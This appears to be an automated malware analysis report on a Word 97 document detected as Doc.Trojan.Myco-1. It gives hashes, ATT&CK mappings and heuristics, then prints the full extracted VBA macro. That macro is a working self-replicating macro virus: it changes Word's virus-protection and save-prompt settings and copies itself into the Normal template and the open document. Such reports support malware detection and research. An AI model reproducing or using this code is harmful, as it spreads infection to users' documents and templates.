Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 385e9c794b24e399…

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-04-14 23:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 77bba2f168de83fbffffd5a7a9a935c7 SHA-1: 048ceee9c93fe70520aeaae055a301df71b0cfbf SHA-256: 385e9c794b24e399857fe6b1ec42b81c1b952e16defbd1bccb827272d53aadad
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a high-severity heuristic indicating a Document_Open macro, and a critical ClamAV detection for 'Doc.Trojan.Myco-1'. The VBA macro code appears to be obfuscated, but it attempts to manipulate macro security settings and potentially execute further malicious code. The presence of the Document_Open macro strongly suggests an attempt to deliver a malicious payload via a spearphishing attachment.

Heuristics 3

  • ClamAV: Doc.Trojan.Myco-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Myco-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3546 bytes
SHA-256: 7e3a803fccad07272c1af63880bd94e66e20f6b0e5384fe2d80156cdd5bb0b1f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim A(1 To 39) As String
A(1) = "ActiveDocument"
A(2) = "Word.ActiveDocument"
A(3) = "Application.ActiveDocument"
A(4) = "Word.Application.ActiveDocument"
A(5) = "System.Application.ActiveDocument"
A(6) = "AddIns.Application.ActiveDocument"
A(7) = "Bookmarks.Application.ActiveDocument"
A(8) = "Documents.Application.ActiveDocument"
A(9) = "Word.System.Application.ActiveDocument"
A(10) = "NormalTemplate"
A(11) = "Word.NormalTemplate"
A(12) = "Application.NormalTemplate"
A(13) = "Word.Application.NormalTemplate"
A(14) = "System.Application.NormalTemplate"
A(15) = "AddIns.Application.NormalTemplate"
A(16) = "Bookmarks.Application.NormalTemplate"
A(17) = "Documents.Application.NormalTemplate"
A(18) = "Word.System.Application.NormalTemplate"
A(19) = "Options"
A(20) = "Word.Options"
A(21) = "Application.Options"
A(22) = "Word.Application.Options"
A(23) = ".VBProject.VBComponents(1)"
A(24) = ".VBProject.VBComponents.Item(1)"
A(25) = ".VBProject.VBComponents(""ThisDocument"")"
A(26) = ".VBProject.VBComponents.Item(""ThisDocument"")"
A(27) = "0"
A(28) = "Yes"
A(29) = "True "
A(30) = "False"
A(31) = "MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 41) & vbCrLf & A(31) & vbCrLf & A(32) & vbCrLf & A(33) & vbCrLf & A(34) & vbCrLf & A(35) & vbCrLf & A(36) & vbCrLf & A(37) & vbCrLf & A(38) & vbCrLf & A(39) & vbCrLf & ""End Sub"""
A(32) = A(Int((Rnd * 3) + 19)) & ".VirusProtection = " & A(Int((Rnd * 3) + 27))
A(33) = A(Int((Rnd * 3) + 19)) & ".SaveNormalPrompt = " & A(Int((Rnd * 3) + 27))
A(34) = A(Int((Rnd * 3) + 19)) & ".ConfirmConversions = " & A(Int((Rnd * 3) + 27))
A(35) = A(Int((Rnd * 8) + 1)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.DeleteLines 1, " & A(Int((Rnd * 8) + 1)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.CountOfLines"
A(36) = A(Int((Rnd * 8) + 1)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.AddFromString MyCode"
A(37) = A(Int((Rnd * 8) + 10)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.DeleteLines 1, " & A(Int((Rnd * 8) + 10)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.CountOfLines"
A(38) = A(Int((Rnd * 8) + 10)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.AddFromString MyCode"
A(39) = A(Int((Rnd * 8) + 1)) & ".SaveAs FileName:=" & A(Int((Rnd * 8) + 1)) & ".FullName"
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 41) & vbCrLf & A(31) & vbCrLf & A(32) & vbCrLf & A(33) & vbCrLf & A(34) & vbCrLf & A(35) & vbCrLf & A(36) & vbCrLf & A(37) & vbCrLf & A(38) & vbCrLf & A(39) & vbCrLf & "End Sub"
Word.Options.VirusProtection = True 
Application.Options.SaveNormalPrompt = 0
Application.Options.ConfirmConversions = Yes
System.Application.ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Word.Application.ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString MyCode
System.Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Application.NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
Bookmarks.Application.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString MyCode
System.Application.ActiveDocument.SaveAs FileName:=Documents.Application.ActiveDocument.FullName
End Sub